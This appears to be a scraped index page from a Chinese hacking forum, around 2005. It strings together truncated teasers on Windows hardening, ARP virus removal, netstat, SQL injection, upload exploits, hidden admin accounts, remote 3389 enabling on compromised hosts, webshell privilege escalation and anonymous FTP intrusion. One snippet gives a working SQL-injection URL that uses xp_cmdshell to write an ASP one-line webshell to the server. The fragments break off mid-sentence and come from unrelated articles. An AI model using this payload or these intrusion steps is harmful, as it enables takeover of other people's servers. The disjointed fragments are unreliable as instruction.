民兵的家园

1：传漏洞利用的原理只是针对form格式上传的asp和php脚本*** nc(netcat)    用于提交数据包    dos界面下运行:    nc -vv www.***.com 80   -vv: 回显    80:  www端口    1.txt: 就是你要发送的数据包   (更多使用方法请查看本区的帖子) wse(wsockexpert)    对本机端口的监视,抓取ie提

Windows 2000 ADS WEB安全配置教程：目前，WIN2000 SERVER是比较流行的服务器操作系统之一，但是要想安全的配置微软的这个操作系统，却不是一件容易的事。本文试图对win2000 SERVER的安全配置进行初步的探讨。一、 定制自己的WIN2000 SERVER；1.版本的选择：WIN2000有各种语言的版本，对于我们来说，可以选择英文版或简体中文版，我强烈建议在语言不成为

首先所有盘取消EVERYONE完全控制权限取消方法点击盘符，右键---属性----安全---会看到允许访问该盘的用户组权限，默认的是EVERYONE完全控制，添加ADMINISTRATORS[管理员组]，和SYSTEM然后将EVERYONE删除。有几个文件夹要特殊注意Program Files/Common Files  该文件夹要允许UESR组有读取，运行和列出文件夹三个权限WINNT/syst

一、简单的"黑客"入侵 二、TCP协议劫持入侵 TCP/IP协议顺序号预测攻击是最简单的"黑客"入侵，也是系统安全的最大威胁。在网络上，每台计算机有惟一的IP地址，计算机把目标IP地址和一个惟一的顺序号加载于传输的每一个数据包上。在一个TCP连接中，接收机只收到具有正确IP地址和顺序号的那个包裹。许多安全设备，如路由器，只允许有一定IP地址的计算机收发传送。TCP/IP 顺序号预测入侵

按以下顺序删除病毒组件   1) 删除 ”病毒组件释放者” %windows%/SYSTEM32/LOADHW.EXE 2) 删除 ”发ARP欺骗包的驱动程序” (兼 “病毒守护程序”) %windows%/System32/drivers/npf.sys a. 在设备管理器中, 单击”查看”-->”显示隐藏的设备” b. 在设备树结构中,打开”非即插即用….” c

ARP缓存在某些情况下给我们的实际工作带来了麻烦。特别是网管在进行一些网络测试时，常常因为它掩盖了网络变化的“真相”，  [正文]    　　IP地址是如何转换为MAC地址，进而实现网络连接的呢？在局域网中，这是通过ARP协议来完成的。为了便于快速查找IP地址与MAC地址，ARP协议自身设计了缓存功能。　　然而，这个缓存却在某些情况下给我们的实际工作带来了麻烦。特别是网管在进行一些网络测试时，常常

 无云 发表于 2005-4-11 15:16:00　SQL注入简介 许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码， （一般是在浏览器地址栏进行,通过正常的www端口访问） 根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。 SQL注入思路 思路最重要,其实好多人都不知道SQ

 QUOTE:1、   用^转义字符来写ASP(一句话木马)文件的方法:   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute request^("l"^)^ >c:/mu.asp;--    echo ^ >c:/mu.asp2、   显示SQL系统版本：   

发表者: youyoudejia在运行里-cmd-netstat -an就会显示出你开的端口了!!最近被病毒搞的头昏脑涨的，不过也收获不小哟，知道了点小方法，与大家共勉。 　　当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的，既然利用到这两个协议，就不可避免要在server端（就是被种了木马的机器了）打开监听端口来等待连接。例如鼎鼎大名的冰河使用

  文章作者:     文章来源:陈十三哥     发布时间:2005-05-17 22:28:54  前几天在某个网站(记不清了，不好意思 ^_*）上看到了一篇介绍如何建立隐藏的超级用户的图文教程，给我了很大

 远程开启3389终端服务(菜鸟篇)by wawa    2002.01.13得到了一台主机的管理员权限,但我们失望的发现这台主机并没有安装3389终端服务组件,是不是有些懊丧呢?别急,下面我们一起来探索一下远程开启3389的方法.首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分产品中都可运行,如:winnt4/win2000server/win20

 用命令查看计算机端口 查看计算机端口用什么命令 用:netstat -a 在2000以上的操作  Displays protocol statistics and current TCP/IP network connections. 显示统计正在使用TCP/IP协议的网络联接 NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [inte

八种扫描器说明八种扫描器说明⑴NSS（网络安全扫描器） NSS由Perl语言编成，它最根本的价值在于它的速度，它运行速度非常快，它可以执行下列常规检查： ■Sendmail ■匿名FTP ■NFS出口 ■TFTP ■Hosts.equiv ■Xhost 注：除非你拥有最高特权，否则NSS不允许你执行Hosts.equiv。 利用NSS，用户可以增加更强大的功能，其中包括： ■AppleTalk扫描

必须掌握的八个DOS命令！一，ping 　　 　　它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看

N年以前利用这个漏洞可以实现目录遍历，虽然微软出了补丁，不过好像补丁是用来限制iis只能访问虚拟目录的，所以漏洞还是存在，只不过利用方式变了。对iis来说，提交一个含有%5c的url能够找到文件，但是该文件里以相对路径引用的其他文件却找不到了（%5c是//的url编码，iis跳转到上一级目录去找，当然找不到；头晕了吧，哈哈，我也头晕啊）。后来这个漏洞就被牛人挖掘出来了，也就是传说中的%5c暴库：由

最近各位一定得到不少肉鸡吧:)，从前段时间的动网的upfile漏洞， 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很BT，你的asp木马可能都用不了，还那里 来的提升啊。我们得到webshell也

问我怎么进行FTP匿名入侵 我才想起还有这种方式 复习简洁一番，总结了我的FTP匿名入侵经历，和大家分享： 假设一台电脑ip 192.188.0.183（这里用我自己的电脑实验）开放FTP服务 在”运行“里输入”CMD“ 输入 ftp 192.188.0.183回车：Connected to 192.188.0.183. 220 phoenix-r Microsoft FTP Service